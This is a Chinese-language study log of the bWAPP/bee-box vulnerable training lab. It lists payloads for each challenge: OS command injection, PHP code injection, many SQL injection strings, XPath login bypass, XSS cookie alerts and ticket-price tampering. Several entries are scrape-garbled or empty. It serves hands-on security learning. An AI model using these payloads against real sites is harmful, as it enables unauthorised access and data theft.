%3c%%%3e中写html,BwApp学习记录(示例代码)

下载&安装

bwapp可以单独下载，然后部署到apache+php+mysql的环境，也可以下载他的虚拟机版本bee-box，但是有好多漏洞是bee-box里边有，但单独安装bwapp没有的，比如破壳漏洞，心脏滴血漏洞等。我这里主要用bee-box进行介绍。

下载地址

开始搞事情

0x00 HTML Injection - Reflected (GET)

【Low】OnClick

【medium】%3ca href=http://www.baidu.com%3eClick%3c/a%3e

0x01 HTML Injection - Reflected (POST)

【Low】OnClick

【medium】%3ca href=http://www.baidu.com%3eClick%3c/a%3e

0x02 iFrame Injection?ParamUrl=http://www.baidu.com

0x03 OS Command Injection

Exploit(Low)www.nsa.gov;id

Exploit(medium)www.nsa.gov|id

0x04 PHP Code Injection?message=phpinfo()

0x05 SQL Injection (GET/Search)

Exploit(Low)-1 %‘+union+select+1,2,3,4,version(),6,7 --+

0x06 SQL Injection (GET/Select)

Exploit(Low)?movie=-1 union select 1,2,3,4,version(),6,7

0x07 SQL Injection (POST/Search)title=Iron+Man%‘UNION SELECT 1,2,3,4,version(),6,7  #

0x08 SQL Injection (POST/Select)movie=-1 UNION SELECT 1,2,3,4,version(),6,7

0x09 SQL Injection (AJAX/JSON/jQuery)http://192.168.0.32/bWAPP/sqli_10-2.php?title=I%%27+UNION+SELECT+1,2,3,4,version(),6,7+--+

0x10 SQL Injection (CAPTCHA)?title=Iron+Man%‘ UNION SELECT 1,2,3,4,version(),6,7 --+

0x11 SQL Injection (Login Form/Hero)superhero‘ or 1=1#

0x12 SQL Injection (Login Form/User)login=‘ and 0 UNION SELECT 1,2,‘356a192b7913b04c54574d18c28d46e6395428ab‘,4,5,6,7,8,9#

&password=1

&form=submit

0x13 SQL Injection - Stored (Blog)‘,(select version()))#

0x14 SQL Injection - Stored (User-Agent)User-AgentL: 123‘,(select version()))#

0x15 SQL Injection - Stored (XML)<?xml  version="1.0" encoding="UTF-8"?>

copyright []>

&test;

login

0x16 SQL Injection - Blind - Boolean-Based?title=Iron Man ‘ and (substr((select version()),1,1)=5) --+

0x17 SQL Injection - Blind - Time-Based?title=Iron Man‘ and (if((substr((select version()),1,1)=5),sleep(5),null)) --+

0x18 SQL Injection - Blind (WS/SOAP)?title=Iron Man ‘ and (substr((select version()),1,1)=5) --+

0x19 XML/XPath Injection (Login Form)http://192.168.0.32/bWAPP/xmli_1.php

?login=‘ or ‘1‘=‘1

&password=‘ or ‘1‘=‘1

&form=submit

0x20 Broken Auth. - CAPTCHA Bypassing

0x21 Broken Auth. - Forgotten Function

0x22 Broken Auth. - Insecure Login Forms

0x23 Broken Auth. - Password Attacks

0x24 Broken Auth. - Weak Passwords

0x25 Session Mgmt. - Administrative Portals

0x26 XSS - Reflected (GET)

0x27 XSS - Reflected (POST)

0x28 XSS - Reflected (JSON)

0x29 XSS - Reflected (AJAX/JSON)

0x30 XSS - Reflected (Back Button)Referer: ‘" οnmοusemοve="alert(1)"

修改请求包referer字段

0x31 XSS - Reflected (Custom Header)bWAPP: 

增加请求包字段

0x32 XSS - Reflected (Eval)?date=alert(document.cookie)

0x33 XSS - Reflected (HREF)>

0x34 XSS - Reflected (Login Form)login=‘ or 1=1

&password=

&form=submit

0x35 XSS - Reflected (PHP_SELF)

0x36 XSS - Reflected (Referer)

0x37 XSS - Reflected (User-Agent)

0x38 XSS - Stored (Blog)

0x39 XSS - Stored (User-Agent)User-Agent: 

0x40 Insecure DOR (Order Tickets)(Low)

ticket_quantity=15&ticket_price=0&action=order

修改 数据包 ticket_price 的值

(medium)

ticket_quantity=15&ticket_price=0&action=order

在 请求包中增加ticket_price 参数 并赋值。